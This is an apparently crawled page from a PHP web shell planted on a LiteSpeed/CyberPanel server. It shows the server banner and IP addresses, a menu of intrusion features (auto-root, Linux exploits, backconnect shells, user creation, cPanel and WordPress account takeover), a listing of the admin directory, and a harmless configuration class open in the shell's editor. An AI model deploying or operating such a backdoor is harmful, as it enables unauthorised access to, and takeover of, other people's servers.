Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
lsws /
admin /
html.open /
view /
[ HOME SHELL ]
Name
Size
Permission
Action
inc
[ DIR ]
drwxr-xr-x
UIBase.php
10.79
KB
-rw-r--r--
UIProperty.php
1.16
KB
-rw-r--r--
ajax_data.php
7.74
KB
-rw-r--r--
compilePHP.php
16.21
KB
-rw-r--r--
confMgr.php
938
B
-rw-r--r--
dashboard.php
19.07
KB
-rw-r--r--
logviewer.php
5.31
KB
-rw-r--r--
realtimestats.php
17.3
KB
-rw-r--r--
serviceMgr.php
739
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : UIProperty.php
<?php class UIProperty { const FLD_PAGE_TITLE = 1; const FLD_FORM_ACTION = 2; const FLD_FORM_HIDDENVARS = 3; const FLD_TABS = 4; const FLD_SERVER_NAME = 5; private $servername; private $page_title; public $no_main_header = false; //set true for lock.php and login.php private $form_action; private $form_hiddenvars; private $tabs; public function Get($field) { switch ($field) { case self::FLD_PAGE_TITLE: return $this->page_title; case self::FLD_FORM_ACTION: return $this->form_action; case self::FLD_FORM_HIDDENVARS: return $this->form_hiddenvars; case self::FLD_TABS: return $this->tabs; case self::FLD_SERVER_NAME: return $this->servername; default: die("illegal field $field"); } } public function Set($field, $val) { switch ($field) { case self::FLD_PAGE_TITLE: $this->page_title = $val; break; case self::FLD_FORM_ACTION: $this->form_action = $val; break; case self::FLD_FORM_HIDDENVARS: $this->form_hiddenvars = $val; break; case self::FLD_TABS: $this->tabs = $val; break; case self::FLD_SERVER_NAME: $this->servername = $val; break; default: die("illegal field $field"); } } }
Close